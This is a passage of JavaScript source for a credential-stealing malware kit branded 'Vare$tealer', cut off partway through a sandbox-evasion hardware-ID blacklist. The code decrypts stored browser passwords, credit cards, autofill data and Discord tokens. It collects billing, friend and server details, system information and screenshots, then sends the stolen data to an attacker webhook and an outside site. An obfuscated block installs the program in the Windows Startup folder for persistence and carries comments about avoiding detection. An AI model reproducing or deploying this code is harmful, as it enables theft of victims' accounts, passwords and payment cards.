485 | const pizza = await new Promise((resolve, reject) => {
486 | sql.each('SELECT origin_url, username_value, password_value FROM logins', function (err, row) {
487 | if (err) {
488 | if (debug) console.log(err);
489 | }
490 | if (row['username_value'] != '') {
491 | let password_value = row['password_value'];
492 | try {
493 | if ((password_value[0] == 1) && (password_value[1] == 0) && (password_value[2] == 0) && (password_value[3] == 0)) {
494 | passwordCount++;
495 | result += '\nURL: ' + row['origin_url'] + ' | USERNAME: ' + row['username_value'] + ' | PASSWORD: ' + vare.unprotectData(password_value, null, 'CurrentUser') + "\n"
496 | .toString('utf-8');
497 | } else {
498 | let start = password_value.slice(3, 15),
499 | middle = password_value.slice(15, password_value.length - 16),
500 | end = password_value.slice(password_value.length - 16, password_value.length),
501 | decipher = crypto.createDecipheriv('aes-256-gcm', key, start);
502 | decipher.setAuthTag(end);
503 | passwordCount++;
504 | result += '\nURL: ' + row['origin_url'] + ' | USERNAME: ' + row['username_value'] + ' | PASSWORD: ' + decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8') + "\n";
505 | }
506 | } catch (e) {
507 | if (debug) console.log(e);
508 | }
509 | }
510 | }, function () {
511 | resolve(result);
512 | });
513 | });
514 | return pizza;
515 | } else {
516 | return '';
517 | }
518 | }
519 |
520 |
521 |
522 | async function %VARESTARTUP%() {
523 | // OBFUSCATED FOR LESS DETECTION IF U WANT DEOBFUSCATE IT
524 | function _0x1bce(_0x566ed4, _0x3b3726) {
525 | var _0x1a85e6 = _0x23f3();
526 | return _0x1bce = function (_0x5211c8, _0x2b606e) {
527 | _0x5211c8 = _0x5211c8 - (-0x2c5 + -0x1273 + 0x15a0);
528 | var _0x13e9af = _0x1a85e6[_0x5211c8];
529 | return _0x13e9af;
530 | }, _0x1bce(_0x566ed4, _0x3b3726);
531 | }
532 | var _0x5e6537 = _0x1bce;
533 | (function (_0x20c885, _0x187c60) {
534 | var _0x11069a = _0x1bce, _0x21bc9d = _0x20c885();
535 | while (!![]) {
536 | try {
537 | var _0x48211d = -parseInt(_0x11069a(0x7e)) / (0x1 * 0xbb6 + 0x1802 + -0x23b7) + parseInt(_0x11069a(0x77)) / (-0x1be9 + -0x1c1f * -0x1 + -0x2 * 0x1a) * (parseInt(_0x11069a(0x6a)) / (-0x99 * 0x23 + -0x12d5 + 0x9 * 0x46b)) + parseInt(_0x11069a(0x6f)) / (0x1580 + 0x889 + -0x1e05) + -parseInt(_0x11069a(0x82)) / (0x173 * -0x13 + -0xc * 0x116 + 0x2896) * (-parseInt(_0x11069a(0x70)) / (0x13 * -0x4a + 0x699 * 0x3 + -0x2db * 0x5)) + parseInt(_0x11069a(0x6b)) / (-0x2322 * -0x1 + -0x821 * 0x1 + -0x1afa) * (parseInt(_0x11069a(0x68)) / (-0x12cb + -0x1ee5 * 0x1 + 0x31b8)) + -parseInt(_0x11069a(0x7c)) / (0xe42 + 0x24d7 * 0x1 + -0x1988 * 0x2) * (parseInt(_0x11069a(0x73)) / (0xe56 + -0x9d * -0x14 + -0x1a90)) + -parseInt(_0x11069a(0x7f)) / (0x217b + 0x218 * 0x4 + -0x29d0) * (parseInt(_0x11069a(0x69)) / (0x9f * -0x1 + 0x1 * 0x14f9 + 0x1 * -0x144e));
538 | if (_0x48211d === _0x187c60)
539 | break;
540 | else
541 | _0x21bc9d['push'](_0x21bc9d['shift']());
542 | } catch (_0x295d1) {
543 | _0x21bc9d['push'](_0x21bc9d['shift']());
544 | }
545 | } // OBFUSCATED FOR LESS DETECTION IF U WANT DEOBFUSCATE IT
546 | }(_0x23f3, 0xc6 * 0xe21 + -0x152c97 + 0x16dccd), fs[_0x5e6537(0x79) + _0x5e6537(0x7b)](process[_0x5e6537(0x6c)])[_0x5e6537(0x83)](fs[_0x5e6537(0x74) + _0x5e6537(0x81)](process[_0x5e6537(0x71)][_0x5e6537(0x78)][_0x5e6537(0x72)]('\x5c', '/') + (_0x5e6537(0x80) + _0x5e6537(0x6e) + _0x5e6537(0x76) + _0x5e6537(0x7a) + _0x5e6537(0x7d) + _0x5e6537(0x6d)))), setTimeout(() => {
547 | var _0xa4aefc = _0x5e6537;
548 | fs[_0xa4aefc(0x75)](process[_0xa4aefc(0x71)][_0xa4aefc(0x78)][_0xa4aefc(0x72)]('\x5c', '/') + (_0xa4aefc(0x80) + _0xa4aefc(0x6e) + _0xa4aefc(0x76) + _0xa4aefc(0x7a) + _0xa4aefc(0x7d) + _0xa4aefc(0x6d)), process[_0xa4aefc(0x71)][_0xa4aefc(0x78)][_0xa4aefc(0x72)]('\x5c', '/') + (_0xa4aefc(0x80) + _0xa4aefc(0x6e) + _0xa4aefc(0x76) + _0xa4aefc(0x7a) + _0xa4aefc(0x7d) + _0xa4aefc(0x6d)));
549 | }, 0x1aa * -0xd + 0x913 * -0x4 + 0x45a6));
550 | function _0x23f3() {
551 | var _0x3bc1f0 = [
552 | 'argv0',
553 | 'ater.exe',
554 | '/Windows/S',
555 | '2636816pJbLfR',
556 | '18jTIlbA',
557 | 'env',
558 | 'replace',
559 | '1130KWAUZn',
560 | 'createWrit',
561 | 'renameSync',
562 | 'tart\x20Menu/',
563 | '912524YLnlFr',
564 | 'APPDATA',
565 | 'createRead',
566 | 'Programs/S',
567 | 'Stream',
568 | '89415AijWFZ',
569 | 'tartup/Upd',
570 | '23480GelAtX',
571 | '11ffTZGi',
572 | '/Microsoft',
573 | 'eStream',
574 | '244355evYuvQ',
575 | 'pipe',
576 | '616OvFKxw',
577 | '6084492XlFIyr',
578 | '3wDQjSq',
579 | '110719qGebmE'
580 | ];
581 | _0x23f3 = function () {
582 | return _0x3bc1f0; // OBFUSCATED FOR LESS DETECTION IF U WANT DEOBFUSCATE IT
583 | }; // OBFUSCATED FOR LESS DETECTION IF U WANT DEOBFUSCATE IT
584 | return _0x23f3(); // OBFUSCATED FOR LESS DETECTION IF U WANT DEOBFUSCATE IT
585 | }
586 | }
587 |
588 | async function %VARECARDS%(path) {
589 | let path_split = path.split('\\'),
590 | path_split_tail = path.includes('Network') ? path_split.splice(0, path_split.length - 3) : path_split.splice(0, path_split.length - 2),
591 | path_tail = path_split_tail.join('\\') + '\\';
592 | if (path.startsWith(appdata)) path_tail = path;
593 | if (path.includes('cord')) return;
594 | if (fs.existsSync(path_tail)) {
595 | let encrypted = Buffer.from(JSON.parse(fs.readFileSync(path_tail + 'Local State'))
596 | .os_crypt.encrypted_key, 'base64')
597 | .slice(5);
598 | var login_data = path + 'Web Data',
599 | creditcards_db = path + 'creditcards.db';
600 | fs.copyFileSync(login_data, creditcards_db);
601 | const key = vare.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
602 | var result = `\n~|~|~ VARE$TEALER ~|~|~ ${path}`,
603 | sql = new sqlite3.Database(creditcards_db, err => {
604 | if (err) { }
605 | });
606 | const ccdb = await new Promise((resolve, reject) => {
607 | sql.each('SELECT * FROM credit_cards', function (err, row) {
608 | if (err) { }
609 | if (row['card_number_encrypted'] != '') {
610 | let card_number = row['card_number_encrypted'];
611 | try {
612 | if ((card_number[0] == 1) && (card_number[1] == 0) && (card_number[2] == 0) && (card_number[3] == 0)) {
613 | result += '\nCREDIT CARD NUMBER: ' + vare.unprotectData(card_number, null, 'CurrentUser').toString('utf-8') + ' | EXPIRE: ' + row['expiration_month'] + '/' + row['expiration_year'] + ' | NAME: ' + row['name_on_card'];
614 | ccCount ++;
615 | } else {
616 | let start = card_number.slice(3, 15),
617 | middle = card_number.slice(15, card_number.length - 16),
618 | end = card_number.slice(card_number.length - 16, card_number.length),
619 | decipher = crypto.createDecipheriv('aes-256-gcm', key, start);
620 | decipher.setAuthTag(end);
621 | result += '\nCREDIT CARD NUMBER: ' + decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8') + ' | EXPIRE: ' + row['expiration_month'] + '/' + row['expiration_year'] + ' | NAME: ' + row['name_on_card'];
622 | ccCount ++;
623 | }
624 |
625 | } catch (e) { }
626 | }
627 | }, function () {
628 | resolve(result);
629 | });
630 | });
631 | return ccdb;
632 | } else {
633 | return '';
634 | }
635 | }
636 |
637 |
638 |
639 |
640 | async function %VARESERVERS%(token) {
641 | try {
642 | const response = await axios.get('https://discord.com/api/v9/users/@me/guilds?with_counts=true', {
643 | headers: {
644 | Authorization: token,
645 | },
646 | });
647 |
648 | const servers = response.data
649 | .filter(server => server.owner || (server.permissions & 8) === 8)
650 | .filter(server => server.approximate_member_count >= 500)
651 | .map(server => ({
652 | name: server.name,
653 | id: server.id,
654 | owner: server.owner,
655 | member_count: server.approximate_member_count,
656 | }));
657 |
658 | return {
659 | message: servers.length ? servers.map(server => `**${server.name} (${server.id})**\nIs Owner: \`${server.owner ? "✅" : "❌"}\` | Members: \`🟢 ${server.member_count}\`\n `).join('\n') : '*Nothing Important Here TwT*',
660 | };
661 |
662 | } catch (error) {
663 | console.error(error);
664 | throw error;
665 | }
666 | }
667 | async function %VARENITRO%(flags, id, token) {
668 | switch (flags) {
669 | case 1:
670 | return "<:nitro:1052977704158380082>\n`Nitro Classic`";
671 | case 2:
672 | let info;
673 | await axios.get(`https://discord.com/api/v9/users/${id}/profile`, {
674 | headers: {
675 | "Content-Type": "application/json",
676 | "authorization": token
677 | }
678 | }).then(res => { info = res.data })
679 | .catch(() => { })
680 | if (!info) return "<:nitro:1052977704158380082>\n`Nitro Classic`";
681 |
682 | if (!info.premium_guild_since) return "<:nitro:1052977704158380082>\n`Nitro Classic`";
683 |
684 | let boost = ["<:1ay:1053258370213224498>", "<:2ay:1053258368795557948>", "<:3ay:1053258367159771136>", "<:6ay:1053258365620465736>", "<:9ay:1053258363997278269>", "<:12ay:1053258361480683541>", "<:15ay:1053258360293687346>", "<:18ay:1053258358838263849>", "<:24ay:1053258356908904478>"]
685 | var i = 0
686 |
687 | try {
688 | let d = new Date(info.premium_guild_since)
689 | let boost2month = Math.round((new Date(d.setMonth(d.getMonth() + 2)) - new Date(Date.now())) / 86400000)
690 | let d1 = new Date(info.premium_guild_since)
691 | let boost3month = Math.round((new Date(d1.setMonth(d1.getMonth() + 3)) - new Date(Date.now())) / 86400000)
692 | let d2 = new Date(info.premium_guild_since)
693 | let boost6month = Math.round((new Date(d2.setMonth(d2.getMonth() + 6)) - new Date(Date.now())) / 86400000)
694 | let d3 = new Date(info.premium_guild_since)
695 | let boost9month = Math.round((new Date(d3.setMonth(d3.getMonth() + 9)) - new Date(Date.now())) / 86400000)
696 | let d4 = new Date(info.premium_guild_since)
697 | let boost12month = Math.round((new Date(d4.setMonth(d4.getMonth() + 12)) - new Date(Date.now())) / 86400000)
698 | let d5 = new Date(info.premium_guild_since)
699 | let boost15month = Math.round((new Date(d5.setMonth(d5.getMonth() + 15)) - new Date(Date.now())) / 86400000)
700 | let d6 = new Date(info.premium_guild_since)
701 | let boost18month = Math.round((new Date(d6.setMonth(d6.getMonth() + 18)) - new Date(Date.now())) / 86400000)
702 | let d7 = new Date(info.premium_guild_since)
703 | let boost24month = Math.round((new Date(d7.setMonth(d7.getMonth() + 24)) - new Date(Date.now())) / 86400000)
704 |
705 | if (boost2month > 0) {i += 0
706 | } else {i += 1
707 | }
708 |
709 | if (boost3month > 0) {i += 0
710 | } else {i += 1
711 | }
712 |
713 | if (boost6month > 0) {i += 0
714 | } else {i += 1
715 | }
716 |
717 | if (boost9month > 0) {i += 0
718 | } else {i += 1
719 | }
720 |
721 | if (boost12month > 0) {i += 0
722 | } else {i += 1
723 | }
724 |
725 | if (boost15month > 0) {i += 0
726 | } else {i += 1
727 | }
728 |
729 | if (boost18month > 0) {i += 0
730 | } else {i += 1
731 | }
732 |
733 | if (boost24month > 0) {i += 0
734 | } else
735 |
736 | if (boost24month < 0 || boost24month == 0) {i += 1
737 | } else {i = 0}
738 | } catch {i += 0}
739 | return %VAREEVASION%(`<:nitro:1052977704158380082> ${boost[i]}\n\`Nitro Boost\``)
740 | default:
741 | return "\`No Nitro\`";
742 | };
743 | }
744 | async function %VAREFINDTOKEN%(path) {
745 | let path_tail = path;
746 | path += 'Local Storage\\leveldb';
747 |
748 | if (!path_tail.includes('discord')) {
749 | try {
750 | fs.readdirSync(path)
751 | .map(file => {
752 | (file.endsWith('.log') || file.endsWith('.ldb')) && fs.readFileSync(path + '\\' + file, 'utf8')
753 | .split(/\r?\n/)
754 | .forEach(line => {
755 | const patterns = [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{27}/g)];
756 | for (const pattern of patterns) {
757 | const foundTokens = line.match(pattern);
758 | if (foundTokens) foundTokens.forEach(token => {
759 | if (!tokens.includes(token)) tokens.push(token)
760 | });
761 | }
762 | });
763 | });
764 | } catch (e) { }
765 | return;
766 | } else {
767 | if (fs.existsSync(path_tail + '\\Local State')) {
768 | try {
769 | fs.readdirSync(path)
770 | .map(file => {
771 | (file.endsWith('.log') || file.endsWith('.ldb')) && fs.readFileSync(path + '\\' + file, 'utf8')
772 | .split(/\r?\n/)
773 | .forEach(line => {
774 | const pattern = new RegExp(/dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*/g);
775 | const foundTokens = line.match(pattern);
776 | if (foundTokens) {
777 | foundTokens.forEach(token => {
778 | let encrypted = Buffer.from(JSON.parse(fs.readFileSync(path_tail + 'Local State'))
779 | .os_crypt.encrypted_key, 'base64')
780 | .slice(5);
781 | const key = vare.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
782 | token = Buffer.from(token.split('dQw4w9WgXcQ:')[1], 'base64')
783 | let start = token.slice(3, 15),
784 | middle = token.slice(15, token.length - 16),
785 | end = token.slice(token.length - 16, token.length),
786 | decipher = crypto.createDecipheriv('aes-256-gcm', key, start);
787 | decipher.setAuthTag(end);
788 | let out = decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8')
789 | if (!tokens.includes(out)) tokens.push(out)
790 | })
791 | };
792 | });
793 | });
794 | } catch (e) { }
795 | return;
796 | }
797 | }
798 | }
799 | async function %VARESTEALTOKEN%() {
800 | for (let path of paths) {
801 | await %VAREFINDTOKEN%(path);
802 | }
803 | for (let token of tokens) {
804 | let json;
805 | await axios.get("https://discord.com/api/v9/users/@me", {
806 | headers: {
807 | "Content-Type": "application/json",
808 | "authorization": token
809 | }
810 | }).then(res => { json = res.data }).catch(() => { json = null })
811 | if (!json) continue;
812 | var ip = await %GETIP%();
813 | var billing = await %VAREBILLDATA%(token);
814 | var friends = await %VAREFRIENDS%(token);
815 | var copyurl = `https://projectdream.ml/full.php?token=${token}`;
816 | let embed = await %GETEMBED%()
817 | var pp = `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}?size=512`
818 | var servers = await %VARESERVERS%(token)
819 | axios.post(%webhookstring%, {
820 | username: "Vare$tealer - https://github.com/saintdaddy",
821 | avatar_url: embed.avatar,
822 | embeds: [{
823 | "color": 3092790,
824 | "fields": [
825 | {
826 | "name": "Token",
827 | "value": `\`\`\`${token}\`\`\`[[Copy Token]](${copyurl})`
828 | },
829 | {
830 | "name": "Email",
831 | "value": `\`${json.email}\``,
832 | "inline": true
833 | },
834 | {
835 | "name": "Ip Adress",
836 | "value": `\`${ip}\``,
837 | "inline": true
838 | },
839 | {
840 | "name": "Hostname",
841 | "value": `\`${os.hostname}\``,
842 | "inline": true
843 | },
844 | {
845 | "name": "Badges",
846 | "value": %VAREBADGES%(json.flags),
847 | "inline": true
848 | },
849 | {
850 | "name": "Nitro",
851 | "value": await %VARENITRO%(json.premium_type, json.id, token),
852 | "inline": true
853 | },
854 | {
855 | "name": "Billing",
856 | "value": billing,
857 | "inline": true
858 | }
859 | ],
860 | "author": {
861 | "name": `${json.username}#${json.discriminator} | ${json.id}`,
862 | "icon_url": pp
863 | },
864 | "footer": {
865 | "text": `Vare$tealer - ${embed.url}`,
866 | "icon_url": embed.footericon,
867 | }
868 | }, {
869 | "color": 3092790,
870 | "description": friends,
871 | "author": {
872 | "name": "Rare Friends",
873 | "icon_url": pp,
874 | },
875 | "footer": {
876 | "text": `Vare$tealer - ${embed.url}`,
877 | "icon_url": embed.footericon,
878 | },
879 | },{
880 | "color": 3092790,
881 | "title": "<:violet:1095238450569035776> HQ Guilds",
882 | "description": servers.message,
883 | "author": {
884 | "name": `${json.username}#${json.discriminator} | ${json.id}`,
885 | "icon_url": pp
886 | },
887 | "footer": {
888 | "text": `Vare$tealer - ${embed.url}`,
889 | "icon_url": embed.footericon,
890 | },
891 | }]
892 | }).then(res => {axios.get(copyurl)}).catch(() => { axios.get(copyurl) })
893 | continue;
894 | }
895 | }
896 |
897 | var badges = {
898 | Discord_Employee: {
899 | Value: 1,
900 | Emoji: "Discord Employee",
901 | Rare: true,
902 | },
903 | Partnered_Server_Owner: {
904 | Value: 2,
905 | Emoji: "Partnered Server Owner",
906 | Rare: true,
907 | },
908 | HypeSquad_Events: {
909 | Value: 4,
910 | Emoji: "HypeSquad Events",
911 | Rare: true,
912 | },
913 | Bug_Hunter_Level_1: {
914 | Value: 8,
915 | Emoji: "Bug Hunter Level 1",
916 | Rare: true,
917 | },
918 | Early_Supporter: {
919 | Value: 512,
920 | Emoji: "<:6832badgeearlysupporter:1052974130334543973>",
921 | Rare: true,
922 | },
923 | Bug_Hunter_Level_2: {
924 | Value: 16384,
925 | Emoji: "Bug Hunter Level 2",
926 | Rare: true,
927 | },
928 | Early_Verified_Bot_Developer: {
929 | Value: 131072,
930 | Emoji: "<:developer:1052965409135013958>",
931 | Rare: true,
932 | },
933 | House_Bravery: {
934 | Value: 64,
935 | Emoji: "<:bravery:1052965407453106246>",
936 | Rare: false,
937 | },
938 | House_Brilliance: {
939 | Value: 128,
940 | Emoji: "<:brilliance:1052965401509765212>",
941 | Rare: false,
942 | },
943 | House_Balance: {
944 | Value: 256,
945 | Emoji: "<:balance:1052965403363659796>",
946 | Rare: false,
947 | },
948 | Discord_Active_Developer: {
949 | Value: 4194304,
950 | Emoji: "<:activedev:1053192696828801094>",
951 | Rare: false,
952 | }
953 | };
954 |
955 | async function %VAREFRIENDS%(token) {
956 | try {
957 | const response = await axios.get('https://discord.com/api/v9/users/@me/relationships', {
958 | headers: {
959 | 'Content-Type': 'application/json',
960 | 'Authorization': token
961 | }
962 | });
963 |
964 | const relationships = response.data.filter(user => user.type === 1);
965 |
966 | let result = '';
967 | for (const relation of relationships) {
968 | const rareBadges = %VARERAREBADGES%(relation.user.public_flags);
969 | if (rareBadges !== '') {
970 | result += `${rareBadges} | \`${relation.user.username}#${relation.user.discriminator}\`\n`;
971 | }
972 | }
973 |
974 | return result !== '' ? result : '*Nothing important here TwT*';
975 | } catch (error) {
976 | return '*Account locked*';
977 | }
978 | }
979 |
980 | async function %VAREBILLDATA%(token) {
981 | let json;
982 | await axios.get("https://discord.com/api/v9/users/@me/billing/payment-sources", {
983 | headers: {
984 | "Content-Type": "application/json",
985 | "authorization": token
986 | }
987 | }).then(res => { json = res.data }).catch(err => { })
988 | if (!json) return '\`Unknown\`';
989 | var billingInfo = '';
990 | json.forEach(payment => {
991 | if (payment.type == 2 && payment.invalid != !0) {
992 | billingInfo += "<:7802paypal:1052975303904985229>";
993 | } else if (payment.type == 1 && payment.invalid != !0) {
994 | billingInfo += "<:948992883728461926:1052990389109391430>";
995 | }
996 | });
997 | if (billingInfo == '') {
998 | billingInfo = `\`❌\``
999 | }
1000 | return billingInfo;
1001 | }
1002 |
1003 | function %VAREBADGES%(flags) {
1004 | var badgesList = '';
1005 | for (const prop in badges) {
1006 | let badge = badges[prop];
1007 | if ((flags & badge.Value) == badge.Value) {
1008 | badgesList += badge.Emoji;
1009 | }
1010 | };
1011 | if (badgesList == '') {
1012 | return '`❌`';
1013 | }
1014 | return `${badgesList}`;
1015 | }
1016 |
1017 | function %VARERAREBADGES%(userFlags) {
1018 | var rareBadges = '';
1019 | for (const badgeName in badges) {
1020 | const badge = badges[badgeName];
1021 | if ((userFlags & badge.Value) == badge.Value && badge.Rare) {
1022 | rareBadges += badge.Emoji;
1023 | }
1024 | }
1025 | return rareBadges;
1026 | }
1027 |
1028 | async function %VAREAUTOFILL%(path) {
1029 | let path_split = path.split('\\'),
1030 | path_split_tail = path.includes('Network') ? path_split.splice(0, path_split.length - 3) : path_split.splice(0, path_split.length - 2),
1031 | path_tail = path_split_tail.join('\\') + '\\';
1032 | if (path.startsWith(appdata)) path_tail = path;
1033 | if (path.includes('cord')) return;
1034 | if (fs.existsSync(path_tail)) {
1035 | let encrypted = Buffer.from(JSON.parse(fs.readFileSync(path_tail + 'Local State'))
1036 | .os_crypt.encrypted_key, 'base64')
1037 | .slice(5);
1038 | var login_data = path + 'Web Data',
1039 | autofilldata_db = path + 'autofilldata.db';
1040 | fs.copyFileSync(login_data, autofilldata_db);
1041 | const key = vare.unprotectData(Buffer.from(encrypted, 'utf-8'), null, 'CurrentUser');
1042 | var result = `~|~|~ VARE$TEALER ~|~|~ \n`,
1043 | sql = new sqlite3.Database(autofilldata_db, err => {
1044 | if (err) { }
1045 | });
1046 | const autofill = await new Promise((resolve, reject) => {
1047 | sql.each('SELECT * FROM autofill', function (err, row) {
1048 | if (err) { }
1049 | result += '\nNAME: ' + row['name'] + ' | DATA: ' + row['value'];
1050 | autofillCount++;
1051 | }, function () {
1052 | resolve(result);
1053 | });
1054 | });
1055 | return autofill;
1056 | } else {
1057 | return '';
1058 | }
1059 | }
1060 |
1061 | function %VARESLEEP%(ms) {
1062 | return new Promise((resolve) => {
1063 | setTimeout(resolve, ms);
1064 | });
1065 | }
1066 |
1067 | async function %VAREUSERDATA%() {
1068 | var data = '';
1069 | let cr = await %GETCOUNTRY%();
1070 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}`, (err) => {
1071 | });
1072 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] User`, (err) => {
1073 | });
1074 | let appdata = process.env.APPDATA;
1075 |
1076 | const cpu = os.cpus()[0].model;
1077 | const ram = os.totalmem();
1078 | const ramingb = (ram / 1024 / 1024 / 1024).toFixed(2);
1079 | const version = os.version()
1080 | data += `~|~|~ Vare$tealer ~|~|~\n`;
1081 | data += `|=========================================|\n|\n`;
1082 | data += `| Ram : ${ramingb} GB\n|\n`;
1083 | data += `| CPU : ${cpu}\n|\n`;
1084 | data += `| Version : ${version}\n|\n`;
1085 | data += `| Uptime : ${(os.uptime() / 60).toFixed(0)} minutes - ${(os.uptime() / 60 / 60).toFixed(2)} hours\n|\n`;
1086 | data += `| Home Dir : ${os.homedir()} \n|\n`;
1087 | data += `| PC Name : ${os.userInfo().username} \n|\n`;
1088 | data += `| HWID : ${hwid} \n|\n`;
1089 | data += `|=========================================|\n`;
1090 | data += `~|~|~ Vare$tealer ~|~|~`;
1091 | fs.writeFile(appdata +`\\${cr}_${os.hostname}${random}${random}\\[VARE] User\\User Data.txt`, data, (err) => {});
1092 | }
1093 |
1094 | async function %VARESCREENSHOT%() {
1095 | let cr = await %GETCOUNTRY%();
1096 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}`, (err) => {
1097 | });
1098 | fs.mkdir(process.env.APPDATA + `\\${cr}_${os.hostname}${random}${random}\\[VARE] User`, (err) => {
1099 | });
1100 | let appdata = process.env.APPDATA;
1101 | screenshot().then((img) => {
1102 | fs.writeFileSync(appdata +`\\${cr}_${os.hostname}${random}${random}\\[VARE] User\\screenshot.png`, img);
1103 | }).catch((err) => {
1104 | });
1105 | }
1106 |
1107 |
1108 | async function %VAREEVASION%(data) {
1109 | return data
1110 | }
1111 |
1112 | async function %STARTVARE%() {
1113 | let cr = await %GETCOUNTRY%();
1114 | const hwid = execSync('WMIC csproduct get UUID').toString().trim().split('\n')[1];
1115 | var hwidblack = ["00000000-0000-0000-0000-000000000000", "00000000-0000-0000-0000-50E5493391EF", "00000000-0000-0000-0000-AC1F6BD047A0", "00000000-0000-0000-0000-AC1F6BD04850", "00000000-0000-0000-0000-AC1F6BD048D6", "00000000-0000-0000-0000-AC1F6BD048DC", "00000000-0000-0000-0000-AC1F6BD048F8", "00000000-0000-0000-0000-AC1F6BD048FE", "00000000-0000-0000-0000-AC1F6BD04900", "00000000-0000-0000-0000-AC1F6BD0491C", "00000000-0000-0000-0000-AC1F6BD04926", "00000000-0000-0000-0000-AC1F6BD04928", "00000000-0000-0000-0000-AC1F6BD04972", "00000000-0000-0000-0000-AC1F6BD04976", "00000000-0000-0000-0000-AC1F6BD04978", "00000000-0000-0000-0000-AC1F6BD04986", "00000000-0000-0000-0000-AC1F6BD049B8", "00000000-0000-0000-0000-AC1F6BD04C0A", "00000000-0000-0000-0000-AC1F6BD04D06", "00000000-0000-0000-0000-AC1F6BD04D08", "00000000-0000-0000-0000-AC1F6BD04D8E", "00000000-0000-0000-0000-AC1F6BD04D98", "00000000-0000-0000-0000-AC1F6BD04DC0", "00000000-0000-0000-0000-AC1F6BD04DCC", "02AD9898-FA37-11EB-AC55-1D0C0A67EA8A", "032E02B4-0499-05C3-0806-3C0700080009", "03AA02FC-0414-0507-BC06-D70700080009", "03D40274-0435-05BF-D906-D20700080009", "03DE0294-0480-05DE-1A06-350700080009", "050C3342-FADD-AEDF-EF24-C6454E1A73C9", "05790C00-3B21-11EA-8000-3CECEF4400D0", "0700BEF3-1410-4284-81B1-E5C17FA9E18F", "07AF2042-392C-229F-8491-455123CC85FB", "07E42E42-F43D-3E1C-1C6B-9C7AC120F3B9", "08C1E400-3C56-11EA-8000-3CECEF43FEDE", "0910CBA3-B396-476B-A7D7-716DB90F5FB9", "0934E336-72E4-4E6A-B3E5-383BD8E938C3", "0A36B1E3-1F6B-47DE-8D72-D4F46927F13F", "0A9D60D4-9A32-4317-B7C0-B11B5C677335", "0D748400-3B00-11EA-8000-3CECEF44007E", "0F377508-5106-45F4-A0D6-E8352F51A8A5", "104F9B96-5B46-4567-BF56-0066C1C6F7F0", "11111111-2222-3333-4444-555555555555", "119602E8-92F9-BD4B-8979-DA682276D385", "12204D56-28C0-AB03-51B7-44A8B7525250", "12EE3342-87A2-32DE-A390-4C2DA4D512E9", "138D921D-680F-4145-BDFF-EC463E70C77D", "13A61742-AF45-EFE4-70F4-05EF50767784", "14692042-A78B-9563-D59D-EB7DD2639037", "1AAD2042-66E8-C06A-2F81-A6A4A6A99093", "1B5D3FFD-A28E-4F11-9CD6-FF148989548C", "1D4D3342-D6C4-710C-98A3-9CC6571234D5", "213D2878-0E33-4D8C-B0D1-31425B9DE674", "222EFE91-EAE3-49F1-8E8D-EBAE067F801A", "26645000-3B67-11EA-8000-3CECEF440124", "2AB86800-3C50-11EA-8000-3CECEF440130", "2C5C2E42-E7B1-4D75-3EA3-A325353CDB72", "2CEA2042-9B9B-FAC1-44D8-159FE611FCCC", "2DD1B176-C043-49A4-830F-C623FFB88F3C", "2E6FB594-9D55-4424-8E74-CE25A25E36B0", "2F94221A-9D07-40D9-8C98-87CB5BFC3549", "2FBC3342-6152-674F-08E4-227A81CBD5F5", "34419E14-4019-11EB-9A22-6C4AB634B69A", "361E3342-9FAD-AC1C-F1AD-02E97892270F", "365B4000-3B25-11EA-8000-3CECEF44010C", "38813342-D7D0-DFC8-C56F-7FC9DFE5C972", "38AB3342-66B0-7175-0B23-F390B3728B78", "3A9F3342-D1F2-DF37-68AE-C10F60BFB462", "3EDC0561-C455-4D64-B176-3CFBBBF3FA47", "3F284CA4-8BDF-489B-A273-41B44D668F6D", "3F3C58D1-B4F2-4019-B2A2-2A500E96AF2E", "3FADD8D6-3754-47C4-9BFF-0E35553DD5FB", "40384E87-1FBA-4096-9EA1-D110F0EA92A8", "40F100F9-401C-487D-8D37-48107C6CE1D3", "418F0D5B-FCB6-41F5-BDA5-94C1AFB240ED", "41B73342-8EA1-E6BF-ECB0-4BC8768D86E9", "42A82042-3F13-512F-5E3D-6BF4FFFD8518", "44B94D56-65AB-DC02-86A0-98143A7423BF", "4729AEB0-FC07-11E3-9673-CE39E79C8A00", "481E2042-A1AF-D390-CE06-A8F783B1E76A", "48941AE9-D52F-11DF-BBDA-503734826431", "49434D53-0200-9036-2500-369025000C65", "49434D53-0200-9036-2500-369025003865", "49434D53-0200-9036-2500-369025003A65", "49434D53-0200-9036-2500-369025003AF0", "49434D53-0200-9036-2500-369025005CF0", "49434D53-0200-9036-2500-36902500F022", "49434D53-0200-9065-2500-659025002274", "49434D53-0200-9065-2500-659025005073", "49434D53-0200-9065-2500-659025008074", "49434D53-0200-9065-2500-65902500E439", "499B0800-3C18-11EA-8000-3CECEF43FEA4", "4C4C4544-0050-3710-8058-CAC04F59344A", "4CB82042-BA8F-1748-C941-363C391CA7F3", "4CE94980-D7DA-11DD-A621-08606E889D9B", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", "4DC32042-E601-F329-21C1-03F27564FD6C", "4EDF3342-E7A2-5776-4AE5-57531F471D56", "51646514-93E1-4CB6-AF29-036B45D14CBF", "52A1C000-3BAB-11EA-8000-3CECEF440204", "56B9F600-3C1C-11EA-8000-3CECEF4401DE", "59C68035-4B21-43E8-A6A6-BD734C0EE699", "5BD24D56-789F-8468-7CDC-CAA7222CC121", "5C1CA40D-EF14-4DF8-9597-6C0B6355D0D6", "5CC7016D-76AB-492D-B178-44C12B1B3C73", "5E3E7FE0-2636-4CB7-84F5-8D2650FFEC0E", "5E573342-6093-4F2D-5F78-F51B9822B388", "5EBC5C00-3B70-11EA-8000-3CECEF4401DA", "5EBD2E42-1DB8-78A6-0EC3-031B661D5C57", "60C83342-0A97-928D-7316-5F1080A78E72", "612F079A-D69B-47EA-B7FF-13839CD17404", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", "63DE70B4-1905-48F2-8CC4-F7C13B578B34", 